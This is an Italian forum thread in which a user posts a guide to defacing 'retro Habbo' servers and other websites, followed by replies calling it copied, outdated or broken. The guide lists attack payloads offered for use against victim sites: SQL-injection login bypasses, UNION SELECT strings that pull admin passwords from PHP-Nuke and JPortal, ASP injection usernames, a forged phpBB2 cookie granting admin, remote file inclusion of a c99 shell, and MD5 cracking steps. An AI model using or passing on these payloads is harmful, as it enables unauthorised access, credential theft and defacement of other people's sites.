Guida Guida Al Deface Di Un Retro Server

LoveInside

Utente Medio
Autore del topic
6 Luglio 2010
202
0
Miglior risposta
0
Salve a tutti gli utenti dello Sciax2Forum, Inizio col dire che QUESTA GUIDA è STATA CREATA SOLO E SOLTANTO A SCOPO INFORMATIVO, E NE IO E NE LO Sciax2 Forum CI PRENDEREMO ATTO DELL'USO CHE NE FARETE.
Detto Ciò Passiamo avanti.
Questa è una guida al Defacing di un retro habbo, Allora Iniziamo :
PHP Site
Per defacciare un sito in PHP potete usare un Remote File Inclusion e siete dentro. Per fare ciò basta scrivere:
Perfavore, Entra oppure Registrati per vedere i Link!

(tutto attaccato).
Dove al posto di
ci mettete il vostro sito naturalmente con la c99 (Shell) dentro, che va messa usando l’FTP.

Oppure si può usare la tecnica SQL Injection, scrivendo nel login:

UserName: ‘or’’=’
Password: ‘or’’=’

Se invece il sito è patchato provvediamo con dei Bug. Proviamo scrivendo nel sito vittima un percorso ke potrebbe portarci all’intera lista di password:

Se vi vedete spuntare qualcosa allora avrete d’avanti la lista di password in MD5 (un sistema di crittografia per le pass in rete). Per decifrarle salvate tutto in un txt e chiudete la connessione. Andate su un sito per pass MD5 (vedere in fondo alla guida) o usate un programma come “Cain & Abel” (un potentissimo BruteForcer per pass in md5). Se la stringa non ci porta da nessuna parte scriviamo:

/passwd (tutto attaccato)
Se non trovate niente pure questa volta si vede che l’Admin è un pò furbo quindi non vi resta che provare l’ultima alternativa. Andate nel percorso

/passwd (tutto attaccato)
Dove al posto di /mlog.html? è stato scritto /mylog.html?. Se non funziona neanche questo lasciate perdere oppure smanettate un pò

PHP-Nuke Site
Ora vi illustro 3 exploit moderni e funzionanti;

Exploit – Modulo Cerca

Andate nel modulo Cerca, ossia la barra dove si mette la parola che vogliamo cercare nel sito e scriviamo: p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* premiamo invio e siamo in Root come amministratori.

Exploit – Top10

Questo modulo non è presente in tutti i siti in PHP-Nuke, anzi in pochi ormai. Ma con un pò di fortuna lo potremmo trovare e al quel punto basta andare in un percorso del sito e iniettare l’exploit:

%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd
,1,1%20FROM%20nuke_authors (tutto attaccato).
Se funziona ci collegheremo come Admin.

Exploit – Sql Injection

Scriviamo nella barra degli indirizzi la stringa:

Avremo come risultato una scritta che dice “Selection from the databse failed!” Se avremo esattamente questo risultato siamo dentro.

Con la stringa
si può creare un nuovo User con privilegi amministrativi con il Nick badangel e Pass topsecret e possiamo fare quello che vogliamo. Se invece volete Nick e Pass tutto vostro allora basta agire sui valori add_aid per il Nick e add_pwd per la Pass

ASP Site
In questo caso possiamo usare la tecnica ASP Injection. Ecco varie stringhe da inserire nel Login Utente per avere i permessi Root

Diventare Utenti senza Neanche registrarsi:

UserName: apostrofo
Password: [nessuna password, lasciate vuoto]

Accedere da Admin:

UserName: ‘ union select Password,1,1,1 from members where UserID = ‘admin’—
Password: [nessuna password]

Diventare automaticamente amministratori

UserName: admin’ –
Password: [nessuna pass]

Primo utente nella lista

UserName: ‘ or 0=0 –sp_password
Password: [nessuna pass]

HTML Site
L’HTML sappiate che, a differenza dei siti in PHP e ASP (che sono linguaggi dinamici), è un linguaggio statico (si chiama anche linguaggio di Markup) o quindi non può essere Hackerato o quasi.
L’unico modo per hackerare un sito in html sarebbe quello di trovare qualche Bug nell’FTP o nel Finger. Oltre a questi attacchi possono essere vulnerabili a XSS.

PHPBB & PHPBB2 Forum
Esistono molti exploit per i forum in PHPBB & PHPBB2, ma sono exploit da compilare in C e da includere nel sito. Quindi per defacciare utilizzando degli exploit bisogna sapere il Linguaggio C. Esiste comunque un bel exploit che ci permette di diventare Root in un forum, l’unica pecca è che dobbiamo usare Firefox. La tecnica che andremo ad utilizzare è Cookie Manipulation. Innanzitutto cancelliamo tutti i Cookie. Entriamo nel sito in PHPBB\2 e usciamo. Adesso utliziamo l’Add-On Extended Cookie Manager 0.8.1 o View Cookies CS 1.0.7 (che ci permettono di modificare i cookie) e apriamo il cookie ke ci ha mandato il forum (l’unico che c’è perchè li abbiamo cancellati tutti prima).

Se avremo una scritta del genere 127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D. Sostituiamola con questa: 127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D (tutto attaccato).
Salvate tutto e torniamo al forum. Adesso saremo admin.
PS: Smanettando un pò con i cookie potete accedere in Root in molti siti.

JPortal
Per hackerare un sito in JPortal basta Injettare all’URL un codice (SQL Injection) e poi fare il Login:

0%20UNION%20SELECT%20id,id,nick,pass,id,id,id,id,i d%20
from%20admins%20LIMIT%201 (tutto attaccato)

Qualke sito per decriptare psw in md5
md5.rednoize.com - reverse engineer md5 hashes - powered by rednoize.com

vi ricordo però CHEQUESTA GUIDA è STATA CREATA SOLO E SOLTANTO A SCOPO INFORMATIVO, E NE IO E NE LO Sciax2 Forum CI PRENDEREMO ATTO DELL'USO CHE NE FARETE.
Spero nel rilievo :S e spero di essere stato utile, Aggiungo che la FONTE è MIA ci ho impiegato 2 ore per farlo, e finalmente ve l'ho postata ^^ Evitate commenti inutili come : " potevi non metterla adesso defacciano di più" percé non è problema mio, io l'ho postato a scopo Informativo non Di Lucro,

Alla prossima Utenti Dello Sciax2 Forum ;D Ci si sente ^^

Riferimento: Guida Al Deface Di Un Retro Server

Molto utile ma

Evitate commenti inutili come : " potevi non metterla adesso defacciano di più" percé non è problema mio, io l'ho postato a scopo Informativo non Di Lucro,

Ma lo sai almeno che vuol dire LUCRO ? :emoji_relieved:

Con quella frase non centra nulla. ;)

Ci sono decine di guide come questa.. Non ho idea se tu abbia fatto copia e incolla ma brava lo stesso

Sia Gli Screen Che Alcuni Link Non Funzionano,Aggiusta Entro 24 Ore O Segnalo.Comunque, Parlo Del PHP Ti Sei Complicata La Vita,Basta Usare BitKinex E Sfruttare Il Piccolo Bug Di Webdav,Senza Ricorrere A Usare Decine Di Link Inutili.Approposito Questa Release Va Spostata In Hacking.

Ultima modifica:

1: Ci sono altre 5 o sei Guide come queste su Sciax2
2: Questo metodo no funge con i retroserver, Si defaccia attraverso la webdav di xammp. @LoveInside
3: E' un copia Incolla fatto male. Almeno inserisci fonte

Ultima modifica:

Metti fonte se non è tua -.-
Non ti farò la predica dicendoti che aumenteranno i defacer ti dico solo che questa guida è inutile!
Brava per l'impegno comunque

Intanto la guida non è tua ma di
{NO SPAM SOLO FONTE} per di più è sbagliato perchè l'username è ADMIN e la password 'or''=' :soso:

Ultima modifica da un moderatore:

la fonte non è tuo e da chiunque lavesti presa non è stata crata bene

Bhe,Che Dire Bella Guida Però Aggiusta I Link :emoji_slight_smile:

bella guida,peccato che non e' tua,son capaci tutti a far copia e incolla

Segnalo per mancanza di fonte, inoltre a mio parere è un topic inutile visto e considerato che qualsiasi cms per retroserver non è defacciabile con questo metodo.

Metti la fonte entro 24 ore.